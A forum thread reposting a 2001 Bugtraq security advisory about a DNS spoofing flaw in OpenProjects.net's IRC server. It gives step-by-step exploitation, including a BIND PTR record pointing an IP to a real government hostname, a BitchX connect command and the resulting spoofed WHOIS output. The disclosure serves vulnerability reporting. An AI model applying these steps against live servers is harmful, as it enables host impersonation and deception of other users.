Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.

tips & tricks L;)

[es] :: Instant Messaging :: IRC :: tips & tricks L;)

[ Pregleda: 3675 | Odgovora: 0 ] > FB > Twit

Postavi temu Odgovori

Autor

Pretraga teme: Traži
Markiranje Štampanje RSS

m r v a

Član broj: 8
Poruke: 1843
*.217.EUnet.yu



Profil

icon tips & tricks L;)12.10.2001. u 00:31 - pre 215 meseci
Date: Tue, 9 Oct 2001 18:45:19 GMT
From: Jukka Mutex <jmutex@Aphex.NewGold.NET>
Message-Id: <200110091845.f99IjJN74537@Aphex.NewGold.NET>
To: bugtraq@securityfocus.com
Subject: OpenProjects IRCD allows DNS spoofing




* OpenProjects.NET IRCD DNS Spoofing *

OpenProjects.net's ircd has some truly braindead code re DNS lookups
and doesn't do a proper double-reverse paranoid lookup. In fact, it
is possible to spoof any hostname that actually exists on the internet.

Here is how to exploit it.

1. Choose a Hostname to Spoof.
It is important to keep in mind that you must choose a hostname that
actually exists, for our example, we will use 'gary7.nsa.gov'

2. Point Your Reverse Lookup To The Hostname.
For our example, we will put the following in our BIND zonefile:
47.222.42.209.in-addr.arpa. IN PTR gary7.nsa.gov.

Where we will assume you are using the same IP I used, 209.42.222.47.

3. Connect To A Vulnerable IRC Server.
BitchX -H 209.42.222.47 jmutex asimov.openprojects.net

Try a WHOIS on yourself.

/whois jmutex
| jmutex (jmutex@gary7.nsa.gov) (Government)
? ircname : Jukka Mutex
? server : asimov.openprojects.net (Fremont, CA)
: idle : 0 hours 0 mins 24 secs (signon: Tue Oct 9 05:32:16 2001)

Credits: jmutex@newgold.net, chrisj@newgold.net, lilo
Found by: Joseph Mallett
Affects: OpenProjects u2.10.05.18.(ipcheck4-5)
Rumored to Affect: Hybrid

Copyright (c) 2001 Joseph Mallett. All rights reserved.
 
Odgovor na temu

[es] :: Instant Messaging :: IRC :: tips & tricks L;)

[ Pregleda: 3675 | Odgovora: 0 ] > FB > Twit

Postavi temu Odgovori

Navigacija
Lista poslednjih: 16, 32, 64, 128 poruka.